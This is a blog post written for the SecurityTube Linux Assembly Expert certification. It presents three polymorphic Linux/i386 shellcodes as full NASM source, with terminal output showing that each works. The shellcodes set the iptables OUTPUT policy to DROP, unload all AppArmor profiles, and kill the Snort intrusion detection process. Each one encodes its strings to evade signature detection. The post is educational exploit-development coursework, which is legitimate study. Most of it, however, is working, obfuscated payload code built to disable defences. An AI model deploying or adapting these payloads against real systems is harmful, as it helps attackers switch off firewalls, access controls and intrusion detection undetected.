Sunday, January 11, 2015

6. Polymorphic shellcode

The exam at the Securitytube Linux Assembly Expert course consists of creating or analyzing shellcodes. This is the sixth assignment, where I have to create and analyze three shellcodes with ndisasm, gdb and libemu.

First polymorphic shellcode: iptables OUTPUT DROP policy

The solution on Github:
https://github.com/Z6543/My_SLAE/blob/master/06_polymorphism/1_iptables.nasm


The original shellcode: http://shell-storm.org/shellcode/files/shellcode-740.php
///sbin/iptables -P OUTPUT DROP (sets the default policy of the OUTPUT chain to DROP)

The solution:
global _start   

section .text
_start:
    ; Linux/i386, NASM syntax. Performs
    ;   execve("///sbin/iptables", {"///sbin/iptables", "-POUTPUT", "DROP", NULL}, NULL)
    ; through int 0x80 (eax = 11 = __NR_execve, ebx = path, ecx = argv, edx = envp).
    ; Polymorphic variant of shell-storm #740: each `push imm32` of the original is
    ; replaced by "mov esi, imm + 0x11111111 / sub esi, 0x11111111 / store at [esp-4] /
    ; sub esp, 4", and register zeroing uses mov + xor instead of xor reg,reg. The stack
    ; layout produced is identical to the original; only the instruction bytes differ.
    ; The repeated "sub esi, 0x11111111" decode stub is itself a constant pattern.
    ; Register roles: eax = 0 (NUL terminators, later the syscall number), edx = 0 (envp),
    ; edi = &"DROP", ecx = &"-POUTPUT" and finally argv, ebx = &"///sbin/iptables",
    ; esi = scratch for the decoded immediates.
    ;xor eax,eax
    mov ebx, eax                    ; eax ^= eax (via ebx) -> eax = 0 whatever its entry value
    xor eax, ebx

    ;xor edx,edx
    mov edx, eax                    ; edx = 0 (envp = NULL)

    ;push eax
    ; NOTE(review): the word is written below esp before esp is lowered; i386 Linux has no
    ; red zone, so a signal delivered between these two instructions could overwrite it.
    ; The same pattern is used for every emulated push below.
    mov dword [esp-4], eax          ; NUL terminator for the "DROP" string
    sub esp, 4

    ;push dword 0x504f5244
    mov esi, 0x61606355             ; 0x61606355 - 0x11111111 = 0x504f5244 = "DROP" (little-endian)
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4
 
    mov edi,esp                     ; edi = &"DROP\0"
    push eax                        ; NUL terminator for "-POUTPUT"

    ;push dword 0x54555054
    mov esi, 0x65666165             ; -> 0x54555054 = "TPUT"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x554f502d
    mov esi, 0x6660613E             ; -> 0x554f502d = "-POU"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    mov ecx,esp                     ; ecx = &"-POUTPUT\0"
    push eax                        ; NUL terminator for the path
    ;push dword 0x73656c62
    mov esi, 0x84767D73             ; -> 0x73656c62 = "bles"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4


    ;push dword 0x61747069
    mov esi, 0x7285817A             ; -> 0x61747069 = "ipta"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x2f6e6962
    mov esi, 0x407F7A73             ; -> 0x2f6e6962 = "bin/"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x732f2f2f
    mov esi, 0x84404040             ; -> 0x732f2f2f = "///s" (leading slashes pad the path to 16 bytes)
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    mov ebx,esp                     ; ebx = &"///sbin/iptables\0" (execve path)
    push eax                        ; argv[3] = NULL
    push edi                        ; argv[2] = "DROP"
    push ecx                        ; argv[1] = "-POUTPUT"
    push ebx                        ; argv[0] = path
    mov ecx,esp                     ; ecx = argv
    xor edx,edx                     ; envp = NULL (edx was already 0; redundant but harmless)
    mov al,0xb                      ; eax = 11 (execve); upper bytes of eax are still 0
    int 0x80

Check if it works:
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# iptables -L OUTPUT
Chain OUTPUT (policy ACCEPT)
...
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# iptables -L OUTPUT
Chain OUTPUT (policy DROP)
...

Second polymorphic shellcode: apparmor teardown

The solution on Github:
https://github.com/Z6543/My_SLAE/blob/master/06_polymorphism/2_apparmor.nasm

The original shellcode:
http://shell-storm.org/shellcode/files/shellcode-765.php

The solution:
global _start

section .text
_start:

  ; Linux/i386, NASM syntax. Performs
  ;   execve("/etc/init.d/apparmor", {"/etc/init.d/apparmor", "teardown", NULL}, NULL)
  ; through int 0x80 (eax = 11, ebx = path, ecx = argv, edx = envp).
  ; Polymorphic variant of shell-storm #765: the syscall number is loaded up front with
  ; push byte / pop, edx is zeroed with mov + xor against ebx, and each `push imm32` is
  ; replaced by the "mov esi, imm + 0x11111111 / sub esi, 0x11111111 / store / sub esp, 4"
  ; sequence. edx (= 0) doubles as the NUL terminator pushed before each string.
  ; Register roles: eax = 11, edx = 0, ecx = &"teardown" then argv, ebx = &path, esi = scratch.
  ; NOTE(review): every emulated push writes to [esp-4] before lowering esp; there is no
  ; red zone on i386 Linux, so this is not safe against a signal arriving in between.
  push byte +0xb                  ; eax = 0xb = __NR_execve (imm8 is sign-extended to a dword)
  pop eax
  ;xor edx,edx
  mov edx, ebx                    ; edx ^= ebx (via copy) -> edx = 0 whatever ebx held
  xor edx, ebx  

  push edx                        ; NUL terminator for "teardown"
  ;push dword 0x6e776f64
      mov esi, 0x7F888075         ; 0x7F888075 - 0x11111111 = 0x6e776f64 = "down"
  sub esi, 0x11111111
      mov dword [esp-4],esi
      sub esp, 4

  ;push dword 0x72616574
                mov esi, 0x83727685     ; -> 0x72616574 = "tear"
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  mov ecx,esp                     ; ecx = &"teardown\0"
  push edx                        ; NUL terminator for the path

  ;push dword 0x726f6d72
                mov esi, 0x83807E83     ; -> 0x726f6d72 = "rmor"
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  ;push dword 0x61707061
                mov esi, 0x72818172     ; -> 0x61707061 = "appa"
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  ;push dword 0x2f642e74
                mov esi, 0x40753F85     ; -> 0x2f642e74 = "t.d/"
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  ;push dword 0x696e692f
                mov esi, 0x7A7F7A40     ; -> 0x696e692f = "/ini"
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  ;push dword 0x6374652f
                mov esi, 0x74857640     ; -> 0x6374652f = "/etc"
                sub esi, 0x11111111
                mov dword [esp-4],esi
                sub esp, 4

  mov ebx,esp                     ; ebx = &"/etc/init.d/apparmor\0" (execve path)
  push edx                        ; argv[2] = NULL
  push ecx                        ; argv[1] = "teardown"
  push ebx                        ; argv[0] = path
  mov ecx,esp                     ; ecx = argv; edx is still 0 = envp
  int 0x80                        ; eax has been 11 since the first two instructions
Check to see if it works:
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# /etc/init.d/apparmor status
apparmor module is loaded.
6 profiles are loaded.
6 profiles are in enforce mode.
   /sbin/dhclient
   /usr/lib/NetworkManager/nm-dhcp-client.action
   /usr/lib/connman/scripts/dhclient-script
   /usr/sbin/mysqld
   /usr/sbin/ntpd
   /usr/sbin/tcpdump
0 profiles are in complain mode.
2 processes have profiles defined.
2 processes are in enforce mode.
   /usr/sbin/mysqld (1588)
   /usr/sbin/ntpd (1310)
0 processes are in complain mode.
0 processes are unconfined but have a profile defined.

root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ./all_compile.sh 2_apparmor
Usage ./all_compile.sh source_file  E.g. ./all_compile.sh test wwhere test.nasm is the source file
[+] Assembling with Nasm ...
[+] Linking ...
[+] Dumping shellcode ...
[+] Creating new shellcode.c ...
[+] Compiling shellcode.c ...
[+] Done! Run ./shellcode to execute!
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ./shellcode
Shellcode Length:  146
 * Unloading AppArmor profiles
   ...done.
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# /etc/init.d/apparmor status
apparmor module is loaded.
0 profiles are loaded.
0 profiles are in enforce mode.
0 profiles are in complain mode.
0 processes have profiles defined.
0 processes are in enforce mode.
0 processes are in complain mode.
0 processes are unconfined but have a profile defined.

Third polymorphic shellcode: kill snort

The solution on Github:
https://github.com/Z6543/My_SLAE/blob/master/06_polymorphism/3_kill_snort.nasm
The original shellcode:
http://shell-storm.org/shellcode/files/shellcode-741.php

The solution:
global _start

section .text
_start:

    ; Linux/i386, NASM syntax. Performs
    ;   execve("/usr/bin/killall", {"/usr/bin/killall", "snort", NULL}, NULL)
    ; through int 0x80 (eax = 11, ebx = path, ecx = argv, edx = envp).
    ; Polymorphic variant of shell-storm #741: eax is still zeroed with xor, but each
    ; `push imm32` of the original is replaced by the "mov esi, imm + 0x11111111 /
    ; sub esi, 0x11111111 / store at [esp-4] / sub esp, 4" sequence.
    ; Register roles: eax = 0 (NUL terminators, later the syscall number), edi = &"snort",
    ; ebx = &path, ecx = argv, edx = 0 (envp), esi = scratch.
    ; NOTE(review): the emulated pushes write below esp before lowering it; i386 Linux has
    ; no red zone, so a signal delivered between the two instructions could clobber the word.
    xor eax,eax                     ; eax = 0

    push eax                        ; four NUL bytes
    push byte +0x74                 ; pushes dword 0x00000074 = "t\0\0\0" (imm8 sign-extended)

    ;push dword 0x726f6e73
    mov esi, 0x83807F84             ; 0x83807F84 - 0x11111111 = 0x726f6e73 = "snor"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    mov edi,esp                     ; edi = &"snort\0"
    push eax                        ; NUL terminator for the path
    
    ;push dword 0x6c6c616c
    mov esi, 0x7D7D727D             ; -> 0x6c6c616c = "lall"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x6c696b2f
    mov esi, 0x7D7A7C40             ; -> 0x6c696b2f = "/kil"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x6e69622f
    mov esi, 0x7F7A7340             ; -> 0x6e69622f = "/bin"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    ;push dword 0x7273752f
    mov esi, 0x83848640             ; -> 0x7273752f = "/usr"
    sub esi, 0x11111111
    mov dword [esp-4],esi
    sub esp, 4

    mov ebx,esp                     ; ebx = &"/usr/bin/killall\0" (execve path)
    push eax                        ; argv[2] = NULL
    push edi                        ; argv[1] = "snort"
    push ebx                        ; argv[0] = path
    mov ecx,esp                     ; ecx = argv
    xor edx,edx                     ; envp = NULL
    mov al,0xb                      ; eax = 11 (execve); upper bytes of eax are still 0
    int 0x80
Check if it works:
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ps -ewf | grep snort
root      9791  4145  0 14:58 pts/1    00:00:00 /bin/bash ./snort
root      9794  9452  0 14:58 pts/0    00:00:00 grep --color=auto snort
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ./all_compile.sh  3_kill_snort && ./shellcode
Usage ./all_compile.sh source_file  E.g. ./all_compile.sh test wwhere test.nasm is the source file
[+] Assembling with Nasm ...
[+] Linking ...
[+] Dumping shellcode ...
[+] Creating new shellcode.c ...
[+] Compiling shellcode.c ...
[+] Done! Run ./shellcode to execute!
Shellcode Length:  111
root@myserver:/home/ubuntu/SLAE_temp/6_polymorphic# ps -ewf | grep snort
root      9813  9452  0 14:58 pts/0    00:00:00 grep --color=auto snort
That's all!
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE - 607
